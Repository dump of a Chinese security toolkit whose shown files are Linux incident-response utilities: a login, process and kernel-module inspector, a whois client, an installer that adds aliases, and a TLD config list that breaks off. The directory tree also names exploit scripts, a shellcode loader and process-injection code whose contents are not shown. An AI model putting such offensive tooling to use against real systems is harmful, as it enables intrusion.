├── .gitignore ├── Emergency ├── Linux │ ├── README.md │ ├── emergency.py │ ├── install.sh │ ├── mywhois.py │ ├── postfile.py │ ├── tldconfig.conf │ └── virustotal.py └── Windows │ └── CVE-2024-38077_Check.bat ├── LICENSE ├── LogTools ├── AccessLogAnylast.py ├── core │ ├── AccessApi.py │ ├── AccessCount.py │ ├── AccessDetail.py │ ├── AccessFreeze.py │ ├── AccessWebshell.py │ └── __init__.py └── settings │ ├── __init__.py │ └── settings.py ├── ManagementTools └── WorkSchedule.py ├── POCS ├── HadoopYarnRCE.py ├── NexusRCE.py └── hfs_get_shell.py ├── PacketTools ├── PacketStruct │ ├── PacketStruct.py │ └── __init__.py ├── PcapSniffer │ └── sniffer.py ├── ProtocolAnylast │ ├── Application │ │ └── HttpAnylast.py │ ├── Ethernet │ │ ├── EthernetAnylast.py │ │ └── __init__.py │ ├── IPNetwork │ │ ├── IPAnylast.py │ │ └── __init__.py │ ├── Transport │ │ ├── IcmpAnylast.py │ │ ├── TcpAnylast.py │ │ ├── UdpAnylast.py │ │ └── __init__.py │ └── __init__.py └── Stream │ ├── Stream.py │ └── StreamStruct.py ├── PentestCode ├── CobaltStrikeCrack.py ├── CobaltStrikeOnlineShellcodeLoader.cs ├── PortainerWeakPasswordScanner.py ├── ProcessDLLInjection.cpp └── ProcessShellcodeInjection.cpp └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | MANIFEST 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | .pytest_cache/ 49 | 50 | # Translations 51 | *.mo 52 | *.pot 53 | 54 | # Django stuff: 55 | *.log 56 | local_settings.py 57 | db.sqlite3 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # Jupyter Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # SageMath parsed files 82 | *.sage.py 83 | 84 | # Environments 85 | .env 86 | .venv 87 | env/ 88 | venv/ 89 | ENV/ 90 | env.bak/ 91 | venv.bak/ 92 | 93 | # Spyder project settings 94 | .spyderproject 95 | .spyproject 96 | 97 | # Rope project settings 98 | .ropeproject 99 | 100 | # mkdocs documentation 101 | /site 102 | 103 | # mypy 104 | .mypy_cache/ 105 | -------------------------------------------------------------------------------- /Emergency/Linux/README.md: -------------------------------------------------------------------------------- 1 | # LinuxEmergency 2 | *** 3 | Linux下的应急工具,支持CentOS系统和RedHat系统,安装方法: 4 | ``` 5 | git clone https://github.com/cisp/LinuxEmergency.git 6 | cd LinuxEmergency 7 | sh ./install.sh 8 | ``` 9 | 10 | 要求root权限 11 | 12 | # 查看操作系统信息: 13 | *** 14 | ``` 15 | [root@centos emergency]# python emergency.py -o 16 | 17 | 内核版本 : Linux-3.10.0-514.26.2.el7.v7.4.qihoo.x86_64-x86_64-with-centos-7.2.1511-Core 18 | CORE数量 : 16 19 | CPU数量 : 16 20 | CPU使用率 : scputimes(user=1.0, nice=0.0, system=0.0, idle=15.0, iowait=0.0, irq=0.0, softirq=0.0, steal=0.0, guest=0.0, guest_nice=0.0) 21 | 内存总量 : 33736994816 22 | 内存使用率 : 5.1 23 | 24 | [root@centos emergency]# 25 | ``` 26 | 27 | # 查看内核模块信息: 28 | *** 29 | ``` 30 | [root@centos emergency]# python emergency.py -k 31 | 内核模块 : nfnetlink_queue 来源 : 32 | 内核模块 : nfnetlink_log 来源 : 33 | 内核模块 : nfnetlink 来源 : nfnetlink_log,nfnetlink_queue 34 | 内核模块 : bluetooth 来源 : 35 | ``` 36 | 37 | # 查看所有登录成功失败的IP地址: 38 | *** 39 | ``` 40 | [root@scentos emergency]# python emergency.py -l 41 | 192.168.100.35 失败 42 | 192.168.100.31 失败 43 | 127.0.0.1 失败 44 | 192.168.100.20 成功 45 | ``` 46 | 47 | # 查看登录成功和失败日志 48 | *** 49 | ``` 50 | # 成功的 -s 51 | [root@centos emergency]# python emergency.py -s | more 52 | 账户 : emergency 时间 : 2017-08-09-11:20 来源 : (192.168.100.24) 53 | 账户 : emergency 时间 : 2017-08-09-14:34 来源 : (192.168.100.24) 54 | 账户 : root 时间 : 2017-09-28-12:38 来源 : (192.168.100.65) 55 | 账户 : root 时间 : 2017-09-28-12:46 来源 : (192.168.100.65) 56 | 账户 : root 时间 : 2017-09-28-13:13 来源 : (192.168.100.65) 57 | 58 | # 失败的 -f 59 | [root@centos emergency]# python emergency.py -f | more 60 | 账户 : emergency 时间 : 192.168.100.34 来源 : Jul-6-21:27---21:27 61 | 账户 : emergency 时间 : 192.168.100.34 来源 : Jul-6-21:25---21:25 62 | 账户 : admin 时间 : 127.0.0.1 来源 : Jul-5-15:32---15:32 63 | 64 | # 如果需要指定IP 加-i参数 ,例如 -i 192.168.100.34; 65 | 66 | ``` 67 | 68 | # 查看进程列表和详细信息 69 | ``` 70 | # 列表信息 71 | [root@centos emergency]# python emergency.py -a 72 | *********************************************************************************************************** 73 | 进程ID号: 2 进程名称: kthreadd 进程用户: root 启动时间: 2018-06-16 07:40:48 74 | CPU占比: 0.0% 内存占比: 0.0% 75 | 网络连接: 76 | *********************************************************************************************************** 77 | *********************************************************************************************************** 78 | 进程ID号: 3 进程名称: ksoftirqd/0 进程用户: root 启动时间: 2018-06-16 07:40:48 79 | CPU占比: 0.0% 内存占比: 0.0% 80 | 网络连接: 81 | *********************************************************************************************************** 82 | ... 83 | 84 | # 详细信息 85 | [root@centos emergency]# python emergency.py -p 28344 86 | *********************************************************************************************************** 87 | 进程ID号: 28344 进程名称: screen 进程用户: emergency 启动时间: 2018-06-22 13:25:30 88 | 工作路径: /home/emergency/ 89 | 进程命令: SCREEN 90 | 父母进程: 1 91 | 亲子进程: [28345] 92 | CPU占比: 0.0% 内存占比: 0.0046135703802% 93 | 网络连接: 94 | 进程环境: 95 | 终端会话 : /bin/bash 96 | 安全会话 : 97 | 登录账户 : emergency 98 | 工作账户 : emergency 99 | 权限路径 : /usr/lib64/ccache:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/emergency/tools:/usr/local/bin:/usr/local/sbin:/usr/local/python3/bin:/home/emergency/.local/bin:/home/emergency/bin 100 | 用户目录 : /home/emergency 101 | 102 | *********************************************************************************************************** 103 | ``` 104 | 105 | # 添加virustotal基本查询功能 106 | ``` 107 | # 检查样本 108 | [root@centos emergency]# python vt.py -f ./LICENSE 109 | ****************************************** 110 | 检测时间: 2018-07-09 07:31:04 111 | 报毒数量: 0 112 | 报毒引擎: [] 113 | 引擎总数: 59 114 | ****************************************** 115 | 116 | # 检查URL 117 | [root@centos emergency]# python vt.py -u http://1.1.1.2/bmi/docs.autodesk.com 118 | ****************************************** 119 | 检测时间: 2018-07-09 16:33:29 120 | 关联样本: 0 121 | 关联连接: 0 122 | 关联域名: 0 123 | ****************************************** 124 | 125 | # 检查域名 126 | [root@centos emergency]# python vt.py -d baidu.com 127 | ****************************************** 128 | 检测时间: 2018-07-09 16:33:35 129 | 关联样本: 202 130 | 关联连接: 100 131 | 关联域名: 8 132 | ****************************************** 133 | 134 | # 检查IP 135 | [root@centos emergency]# python vt.py -a 114.114.114.114 136 | ****************************************** 137 | 检测时间: 2018-07-09 16:34:05 138 | 关联样本: 135 139 | 关联连接: 93 140 | 关联域名: 592 141 | ****************************************** 142 | ``` 143 | 144 | # 增加查看whois信息的功能 145 | ``` 146 | [root@centos emergency]# python mywhois.py -d baidu.com 147 | Domain Name: baidu.com 148 | Registry Domain ID: 11181110_DOMAIN_COM-VRSN 149 | Registrar WHOIS Server: whois.markmonitor.com 150 | Registrar URL: http://www.markmonitor.com 151 | Updated Date: 2017-07-27T19:36:28-0700 152 | Creation Date: 1999-10-11T04:05:17-0700 153 | Registrar Registration Expiration Date: 2026-10-11T00:00:00-0700 154 | Registrar: MarkMonitor, Inc. 155 | Registrar IANA ID: 292 156 | Registrar Abuse Contact Email: abusecomplaints@markmonitor.com 157 | Registrar Abuse Contact Phone: +1.2083895740 158 | Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited) 159 | Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited) 160 | Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited) 161 | Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited) 162 | Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited) 163 | Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited) 164 | Registrant Organization: Beijing Baidu Netcom Science Technology Co., Ltd. 165 | Registrant State/Province: Beijing 166 | Registrant Country: CN 167 | Admin Organization: Beijing Baidu Netcom Science Technology Co., Ltd. 168 | Admin State/Province: Beijing 169 | Admin Country: CN 170 | Tech Organization: Beijing Baidu Netcom Science Technology Co., Ltd. 171 | Tech State/Province: Beijing 172 | Tech Country: CN 173 | Name Server: ns4.baidu.com 174 | Name Server: ns3.baidu.com 175 | Name Server: dns.baidu.com 176 | Name Server: ns2.baidu.com 177 | Name Server: ns7.baidu.com 178 | DNSSEC: unsigned 179 | URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ 180 | >>> Last update of WHOIS database: 2018-07-09T02:21:59-0700 <<< 181 | 182 | If certain contact information is not shown for a Registrant, Administrative, 183 | or Technical contact, and you wish to send a message to these contacts, please 184 | send your message to whoisrelay@markmonitor.com and specify the domain name in 185 | the subject line. We will forward that message to the underlying contact. 186 | 187 | If you have a legitimate interest in viewing the non-public WHOIS details, send 188 | your request and the reasons for your request to abusecomplaints@markmonitor.com 189 | and specify the domain name in the subject line. We will review that request and 190 | may ask for supporting documentation and explanation. 191 | 192 | The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com for 193 | information purposes, and to assist persons in obtaining information about or 194 | related to a domain name registration record. MarkMonitor.com does not guarantee 195 | its accuracy. By submitting a WHOIS query, you agree that you will use this Data 196 | only for lawful purposes and that, under no circumstances will you use this Data to: 197 | (1) allow, enable, or otherwise support the transmission of mass unsolicited, 198 | commercial advertising or solicitations via e-mail (spam); or 199 | (2) enable high volume, automated, electronic processes that apply to 200 | MarkMonitor.com (or its systems). 201 | MarkMonitor.com reserves the right to modify these terms at any time. 202 | By submitting this query, you agree to abide by this policy. 203 | 204 | MarkMonitor is the Global Leader in Online Brand Protection. 205 | 206 | MarkMonitor Domain Management(TM) 207 | MarkMonitor Brand Protection(TM) 208 | MarkMonitor AntiPiracy(TM) 209 | MarkMonitor AntiFraud(TM) 210 | Professional and Managed Services 211 | 212 | Visit MarkMonitor at http://www.markmonitor.com 213 | Contact us at +1.8007459229 214 | In Europe, at +44.02032062220 215 | 216 | For more information on Whois status codes, please visit 217 | https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en 218 | -- 219 | 220 | ``` 221 | -------------------------------------------------------------------------------- /Emergency/Linux/emergency.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | 4 | ''' 5 | Linux应急进程、网络信息查看器 6 | ''' 7 | 8 | 9 | # 进入依赖库 10 | import os 11 | import sys 12 | import time 13 | import psutil 14 | import platform 15 | from optparse import OptionParser 16 | 17 | 18 | # 全局函数: 19 | def OSinfo(): 20 | '''操作系统基本信息查看''' 21 | core_number = psutil.cpu_count() 22 | cpu_number = psutil.cpu_count(logical=True) 23 | cpu_usage_precent = psutil.cpu_times_percent() 24 | mem_info = psutil.virtual_memory() 25 | result = { 26 | "memtotal": mem_info[0], 27 | "memavail": mem_info[1], 28 | "memprecn": mem_info[2], 29 | "memusage": mem_info[3], 30 | "memfreed": mem_info[4], 31 | } 32 | print ''' 33 | 内核版本 : %s 34 | CORE数量 : %s 35 | CPU数量 : %s 36 | CPU使用率 : %s 37 | 内存总量 : %s 38 | 内存使用率 : %s 39 | '''%(str(platform.platform()),str(core_number),str(cpu_number),str(cpu_usage_precent),str(mem_info[0]),str(mem_info[2])) 40 | 41 | def SuccessLoginDetail(): 42 | '''查找登录成功的记录''' 43 | try: 44 | successer_list = os.popen("who /var/log/wtmp | awk '{print $1,$3\"-\"$4\"\",$5}'").read().split('\n')[:-1] 45 | except Exception, reason: 46 | print "读取记录失败" 47 | exit(0) 48 | if len(successer_list) == 1 and successer_list[0] == '': 49 | print "未找到成功的登录信息" 50 | exit(0) 51 | for success in successer_list: 52 | info_string = success.split(" ") 53 | try: 54 | print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[1],info_string[2]) 55 | except Exception: 56 | continue 57 | 58 | 59 | def FailedLoginDetail(): 60 | '''查找登录失败的日志''' 61 | try: 62 | failer_list = os.popen("lastb | awk '{print $1,$3,$5\"-\"$6\"-\"$7\"-\"$8\"-\"$9}'").read().split('\n')[0:-3] 63 | except Exception, reason: 64 | print "读取记录失败" 65 | exit(0) 66 | if len(failer_list) == 1 and successer_list[0] == '': 67 | print "未找到失败的登录信息" 68 | exit(0) 69 | for failer in failer_list: 70 | info_string = failer.split(" ") 71 | try: 72 | print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[1],info_string[2]) 73 | except Exception: 74 | continue 75 | 76 | def LoginIpList(): 77 | '''登录IP列表''' 78 | ipresult = [] 79 | flag = True 80 | try: 81 | ip_failer_list = os.popen("lastb | awk '{print $3}' | sort | uniq -c | sort -k 1").read().split("\n")[2:-1] 82 | except Exception, reason: 83 | flag = False 84 | if flag: 85 | for ip in ip_failer_list: 86 | ipaddress = ip.lstrip().split(' ') 87 | ipaddr = ipaddress[1] 88 | if 'Thu' in ipaddr: 89 | continue 90 | ipresult.append((ipaddr,'失败')) 91 | flag = True 92 | try: 93 | ip_success_list = os.popen("who /var/log/wtmp| awk '{print $5}' | sort | uniq -c | sort -k 1").read().split("\n")[:-1] 94 | except Exception, reason: 95 | flag = False 96 | if flag: 97 | if len(ip_success_list) == 0: 98 | pass 99 | else: 100 | for ip in ip_success_list: 101 | ipaddress = ip.lstrip().split(' ') 102 | ipaddr = ipaddress[1] 103 | if ':' in ipaddr: 104 | continue 105 | ipaddr = ipaddr.replace('(','').replace(')','') 106 | ipresult.append((ipaddr,"成功")) 107 | for ip in ipresult: 108 | print '%s %s'%(str(ip[0]),str(ip[1])) 109 | 110 | 111 | def LoginCheckByIP(ipaddress,kind="success"): 112 | '''查看IP的登录信息查看''' 113 | command = "who /var/log/wtmp | grep -E \"%s\" | awk '{print $1,$3\"-\"$4\"\",$5}'"%ipaddress if kind == 'success' else "lastb | grep -E \"%s\" | awk '{print $1,$3,$5\"-\"$6\"-\"$7\"-\"$8\"-\"$9}'"%ipaddress 114 | try: 115 | _list = os.popen(command).read().split('\n') 116 | except Exception, reason: 117 | print "读取记录失败" 118 | exit(0) 119 | if len(_list) == 1 and _list[0] == '': 120 | print "未找到相关的登录信息" 121 | exit(0) 122 | for ip in _list: 123 | info_string = ip.split(" ") 124 | try: 125 | print '账户 : %s 时间 : %s 来源 : %s'%(info_string[0],info_string[1],info_string[2]) 126 | except Exception: 127 | continue 128 | 129 | def KernelModInfo(): 130 | '''查看内核加载模块''' 131 | result = [] 132 | try: 133 | modlist = os.popen("lsmod | awk '{print $1,$4}'").read().split('\n')[1:-1] 134 | for mod in modlist: 135 | modname = mod.split(' ')[0] 136 | modsource = mod.split(' ')[1] 137 | result.append((modname,modsource)) 138 | except Exception, reason: 139 | pass 140 | for ret in result: 141 | print "内核模块 : %s 来源 : %s"%(ret[0],ret[1]) 142 | 143 | 144 | def ShowProcessInfo(pid,detail=True): 145 | '''进程和网络信息查看''' 146 | process = psutil.Process(pid) 147 | command = '' 148 | for string in process.cmdline(): 149 | command += ' %s'%string 150 | command = command.lstrip() 151 | connections = "" 152 | for connection in process.connections(kind='inet'): 153 | sip = connection[3][0].replace(":","") 154 | dip = connection[4][0].replace(":","") 155 | sport = connection[3][1] 156 | dport = connection[4][1] 157 | state = connection[5] 158 | connections += "\n SIP:%s SPORT:%s - DIP:%s DPORT:%s [%s]"%(str(sip),str(sport),str(dip),str(dport),state) 159 | envir = process.environ() 160 | evistring = """ 161 | 终端会话 : %s 162 | 安全会话 : %s 163 | 登录账户 : %s 164 | 工作账户 : %s 165 | 权限路径 : %s 166 | 用户目录 : %s 167 | """%(str(envir.get("SHELL","")),str(envir.get('SECURITYSESSIONID','')),str(envir.get('LOGNAME','')),str(envir.get('USER','')),str(envir.get('PATH','')),str(envir.get('HOME',''))) 168 | print "***********************************************************************************************************" 169 | print "进程ID号:",pid," 进程名称:",process.name()," 进程用户:",process.username()," 启动时间:",time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(int(process.create_time()))) 170 | if detail: 171 | try: 172 | cwd = process.cwd() 173 | print "工作路径:",cwd 174 | except Exception: 175 | print "工作路径:" 176 | print "进程命令:",command 177 | print "父母进程:",process.ppid() 178 | print "亲子进程:",[x.pid for x in list(process.children())] 179 | print "CPU占比:",str(process.cpu_percent())+"%"," 内存占比:",str(process.memory_percent())+"%" 180 | print "网络连接:",connections 181 | if detail: 182 | print "进程环境:",evistring 183 | print "***********************************************************************************************************" 184 | 185 | 186 | if __name__ == "__main__": 187 | parser = OptionParser() 188 | parser.add_option("-p", "--process",dest="process",help="show process detail") 189 | parser.add_option("-a","--all",action='store_true',dest="all",help="show all process") 190 | parser.add_option("-o", "--osinfo",action='store_true',dest="osinfo",help="set search time") 191 | parser.add_option("-i","--ipaddress",dest="ipaddress",help="set search ipaddress") 192 | parser.add_option("-f","--failer",action='store_true',dest="failed",help="show failed login") 193 | parser.add_option("-s","--success",action='store_true',dest="successed",help="show successed login") 194 | parser.add_option("-l","--iplist",action='store_true',dest="iplist",help="show login ip list") 195 | parser.add_option("-k","--kernel",action='store_true',dest="kernel",help="show login ip list") 196 | (options, args) = parser.parse_args() 197 | if options.ipaddress not in [None,""] and options.successed: 198 | LoginCheckByIP(options.ipaddress,kind='success') 199 | exit(0) 200 | elif options.ipaddress not in [None,""] and options.failed: 201 | LoginCheckByIP(options.ipaddress,kind='failed') 202 | exit(0) 203 | if options.osinfo: 204 | OSinfo() 205 | exit(0) 206 | if options.iplist: 207 | LoginIpList() 208 | if options.kernel: 209 | KernelModInfo() 210 | if options.failed: 211 | FailedLoginDetail() 212 | exit(0) 213 | if options.successed: 214 | SuccessLoginDetail() 215 | exit(0) 216 | if options.all: 217 | for pid in psutil.pids(): 218 | try: 219 | ShowProcessInfo(int(pid),detail=False) 220 | except Exception: 221 | pass 222 | else: 223 | if options.process != None: 224 | try: 225 | ShowProcessInfo(int(options.process)) 226 | except Exception, reason: 227 | pass 228 | -------------------------------------------------------------------------------- /Emergency/Linux/install.sh: -------------------------------------------------------------------------------- 1 | # /bin/bash 2 | pip2 install simplejson 3 | pip2 install psutil 4 | pip2 install httplib 5 | pip2 install mimetypes 6 | path=`pwd` 7 | command1="alias emg='python " 8 | command2="alias whois='python " 9 | command3="alias vt='python " 10 | files1="/emergency.py'" 11 | files2="/mywhois.py'" 12 | files3="/virustotal.py'" 13 | var1=$command1$path$files1 14 | var2=$command2$path$files2 15 | var3=$command3$path$files3 16 | echo $var1 >> /root/.bash_profile 17 | echo $var2 >> /root/.bash_profile 18 | echo $var3 >> /root/.bash_profile 19 | source /root/.bash_profile 20 | -------------------------------------------------------------------------------- /Emergency/Linux/mywhois.py: -------------------------------------------------------------------------------- 1 | # -*- coding:UTF-8 -*- 2 | 3 | 4 | # 引入依赖的Py库、包、模块 5 | import re 6 | import json 7 | import socket 8 | import datetime 9 | from optparse import OptionParser 10 | 11 | 12 | # 定义全局变量 13 | whoisserver = {} 14 | 15 | def config_read(): 16 | global whoisserver 17 | with open("./tldconfig.conf", 'r') as fr: 18 | for line in fr.readlines(): 19 | line = line.split("\n")[0].split("\r")[0] 20 | line = line.split(":") 21 | domain = line[0] 22 | server = line[1] 23 | if domain not in whoisserver: 24 | whoisserver[domain] = server 25 | 26 | 27 | def get_whois_server(domain): 28 | domainlist = domain.split(".") 29 | tld = domainlist[-2]+"."+domainlist[-1] 30 | if tld in whoisserver: 31 | return whoisserver[tld] 32 | else: 33 | tld = domainlist[-1] 34 | if tld in whoisserver and tld not in ['net','com']: 35 | return whoisserver[tld] 36 | else: 37 | con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 38 | try: 39 | con.connect(('whois.verisign-grs.com',43)) 40 | except Exception, reason: 41 | con.close() 42 | return None 43 | tld = domainlist[-2]+"."+domainlist[-1] 44 | package = '=%s\r\n'%tld 45 | try: 46 | con.send(package) 47 | except Exception, reason: 48 | con.close() 49 | return None 50 | try: 51 | data = con.recv(1024) 52 | except Exception, reason: 53 | con.close() 54 | return None 55 | con.close() 56 | _dict = data.split('\n\n') 57 | if data.find('No match for') >= 0: 58 | return None 59 | key = 'Domain Name: %s' %(tld.upper()) 60 | data = [x for x in _dict if key in x] 61 | try: 62 | server = re.findall(r'Whois Server: ([A-Za-z0-9\-\_\.]*)',str(data))[0] 63 | except Exception, reason: 64 | try: 65 | server = re.findall(r'WHOIS Server: ([A-Za-z0-9\-\_\.]*)',str(data))[0] 66 | except Exception, reason: 67 | return None 68 | return server 69 | 70 | 71 | def whois_check(server,domain): 72 | con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 73 | try: 74 | con.connect((server,43)) 75 | except Exception, reason: 76 | con.close() 77 | return None 78 | package = '%s\r\n' %(domain) 79 | try: 80 | con.send(package) 81 | except Exception, reason: 82 | con.close() 83 | return None 84 | try: 85 | ret = con.recv(4096) 86 | xcount = 0 87 | while ret.find('For more information') < 0: 88 | xcount += 1 89 | ret += con.recv(4096) 90 | if xcount > 5: 91 | break 92 | except Exception, reason: 93 | con.close() 94 | return None 95 | con.close() 96 | print ret 97 | return 0 98 | 99 | if __name__ == '__main__': 100 | parser = OptionParser("") 101 | parser.add_option("-d", dest="domain",help="domain to check", metavar="domain") 102 | (options, args) = parser.parse_args() 103 | config_read() 104 | if options.domain != None: 105 | server = get_whois_server(options.domain) 106 | whois_check(server,options.domain) 107 | else: 108 | print '请输入域名!' 109 | -------------------------------------------------------------------------------- /Emergency/Linux/postfile.py: -------------------------------------------------------------------------------- 1 | import httplib, mimetypes 2 | 3 | def post_multipart(host, selector, fields, files): 4 | """ 5 | Post fields and files to an http host as multipart/form-data. 6 | fields is a sequence of (name, value) elements for regular form fields. 7 | files is a sequence of (name, filename, value) elements for data to be uploaded as files 8 | Return the server's response page. 9 | """ 10 | content_type, body = encode_multipart_formdata(fields, files) 11 | h = httplib.HTTP(host) 12 | h.putrequest('POST', selector) 13 | h.putheader('content-type', content_type) 14 | h.putheader('content-length', str(len(body))) 15 | h.endheaders() 16 | h.send(body) 17 | errcode, errmsg, headers = h.getreply() 18 | return h.file.read() 19 | 20 | def encode_multipart_formdata(fields, files): 21 | """ 22 | fields is a sequence of (name, value) elements for regular form fields. 23 | files is a sequence of (name, filename, value) elements for data to be uploaded as files 24 | Return (content_type, body) ready for httplib.HTTP instance 25 | """ 26 | BOUNDARY = '----------ThIs_Is_tHe_bouNdaRY_$' 27 | CRLF = '\r\n' 28 | L = [] 29 | for (key, value) in fields: 30 | L.append('--' + BOUNDARY) 31 | L.append('Content-Disposition: form-data; name="%s"' % key) 32 | L.append('') 33 | L.append(value) 34 | for (key, filename, value) in files: 35 | L.append('--' + BOUNDARY) 36 | L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) 37 | L.append('Content-Type: %s' % get_content_type(filename)) 38 | L.append('') 39 | L.append(value) 40 | L.append('--' + BOUNDARY + '--') 41 | L.append('') 42 | body = CRLF.join(L) 43 | content_type = 'multipart/form-data; boundary=%s' % BOUNDARY 44 | return content_type, body 45 | 46 | def get_content_type(filename): 47 | return mimetypes.guess_type(filename)[0] or 'application/octet-stream' -------------------------------------------------------------------------------- /Emergency/Linux/tldconfig.conf: -------------------------------------------------------------------------------- 1 | com:whois.verisign-grs.com, 2 | net:whois.verisign-grs.com, 3 | uno:whois.nic.uno, 4 | top:whois.nic.top, 5 | sx:whois.nic.sx, 6 | in:whois.inregistry.net, 7 | co:whois.nic.co, 8 | org:whois.pir.org, 9 | info:whois.afilias.info, 10 | biz:whois.neulevel.biz, 11 | us:whois.nic.us, 12 | uk:whois.nic.uk, 13 | ca:whois.cira.ca, 14 | tel:whois.nic.tel, 15 | ie:whois.iedr.ie, 16 | it:whois.nic.it, 17 | li:whois.nic.li, 18 | no:whois.norid.no, 19 | cc:whois.nic.cc, 20 | eu:whois.eu, 21 | nu:whois.nic.nu, 22 | au:whois.aunic.net, 23 | de:whois.denic.de, 24 | ws:whois.worldsite.ws, 25 | sc:whois2.afilias-grs.net, 26 | mobi:whois.dotmobiregistry.net, 27 | pro:whois.registrypro.pro, 28 | edu:whois.educause.net, 29 | tv:whois.nic.tv, 30 | travel:whois.nic.travel, 31 | name:whois.nic.name, 32 | in:whois.inregistry.net, 33 | me:whois.nic.me, 34 | at:whois.nic.at, 35 | be:whois.dns.be, 36 | cn:whois.cnnic.cn, 37 | edu.cn:whois.edu.cn, 38 | asia:whois.nic.asia, 39 | ru:whois.ripn.ru, 40 | ro:whois.rotld.ro, 41 | aero:whois.aero, 42 | fr:whois.nic.fr, 43 | se:whois.iis.se, 44 | nl:whois.sidn.nl, 45 | nz:whois.srs.net.nz, 46 | mx:whois.nic.mx, 47 | tw:whois.apnic.net, 48 | ch:whois.nic.ch, 49 | hk:whois.hknic.net.hk, 50 | ac:whois.nic.ac, 51 | ae:whois.nic.ae, 52 | af:whois.nic.af, 53 | ag:whois.nic.ag, 54 | al:whois.ripe.net, 55 | am:whois.amnic.net, 56 | as:whois.nic.as, 57 | az:whois.ripe.net, 58 | ba:whois.ripe.net, 59 | bg:whois.register.bg, 60 | bi:whois.nic.bi, 61 | bj:www.nic.bj, 62 | br:whois.nic.br, 63 | br.com:whois.centralnic.net, 64 | eu.org:whois.eu.org, 65 | bt:whois.netnames.net, 66 | by:whois.ripe.net, 67 | bz:whois.belizenic.bz, 68 | cd:whois.nic.cd, 69 | ck:whois.nic.ck, 70 | cl:nic.cl, 71 | coop:whois.nic.coop, 72 | cx:whois.nic.cx, 73 | cy:whois.ripe.net, 74 | cz:whois.nic.cz, 75 | host:whois.nic.host, 76 | dk:whois.dk-hostmaster.dk, 77 | dm:whois.nic.cx, 78 | dz:whois.ripe.net, 79 | ee:whois.eenet.ee, 80 | eg:whois.ripe.net, 81 | es:whois.ripe.net, 82 | fi:whois.ficora.fi, 83 | fo:whois.ripe.net, 84 | gb:whois.ripe.net, 85 | ge:whois.ripe.net, 86 | gl:whois.ripe.net, 87 | gm:whois.ripe.net, 88 | gov:whois.nic.gov, 89 | gr:whois.ripe.net, 90 | gs:whois.adamsnames.tc, 91 | hm:whois.registry.hm, 92 | hn:whois2.afilias-grs.net, 93 | hr:whois.ripe.net, 94 | hu:whois.ripe.net, 95 | il:whois.isoc.org.il, 96 | int:whois.isi.edu, 97 | iq:vrx.net, 98 | ir:whois.nic.ir, 99 | is:whois.isnic.is, 100 | je:whois.je, 101 | jp:whois.jprs.jp, 102 | kg:whois.domain.kg, 103 | market:whois.rightside.co, 104 | ltd:whois.donuts.co, 105 | design:whois.nic.design, 106 | wiki:whois.nic.wiki, 107 | science:whois.nic.science, 108 | software:whois.rightside.co, 109 | social:whois.unitedtld.com, 110 | online:whois.nic.online, 111 | kr:whois.nic.or.kr, 112 | la:whois2.afilias-grs.net, 113 | lt:whois.domreg.lt, 114 | lu:whois.restena.lu, 115 | lv:whois.nic.lv, 116 | ly:whois.lydomains.com, 117 | ma:whois.iam.net.ma, 118 | mc:whois.ripe.net, 119 | md:whois.nic.md, 120 | mil:whois.nic.mil, 121 | mk:whois.ripe.net, 122 | ms:whois.nic.ms, 123 | mt:whois.ripe.net, 124 | mu:whois.nic.mu, 125 | my:whois.mynic.net.my, 126 | nf:whois.nic.cx, 127 | pl:whois.dns.pl, 128 | pr:whois.nic.pr, 129 | pt:whois.dns.pt, 130 | sa:saudinic.net.sa, 131 | sb:whois.nic.net.sb, 132 | sg:whois.nic.net.sg, 133 | sh:whois.nic.sh, 134 | si:whois.arnes.si, 135 | sk:whois.sk-nic.sk, 136 | sm:whois.ripe.net, 137 | st:whois.nic.st, 138 | su:whois.ripn.net, 139 | tc:whois.adamsnames.tc, 140 | tf:whois.nic.tf, 141 | th:whois.thnic.net, 142 | tj:whois.nic.tj, 143 | tk:whois.dot.tk, 144 | tl:whois.domains.tl, 145 | tm:whois.nic.tm, 146 | tn:whois.ripe.net, 147 | to:whois.tonic.to, 148 | tp:whois.domains.tl, 149 | tr:whois.nic.tr, 150 | ua:whois.ripe.net, 151 | uy:nic.uy, 152 | uz:whois.cctld.uz, 153 | va:whois.ripe.net, 154 | vc:whois2.afilias-grs.net, 155 | 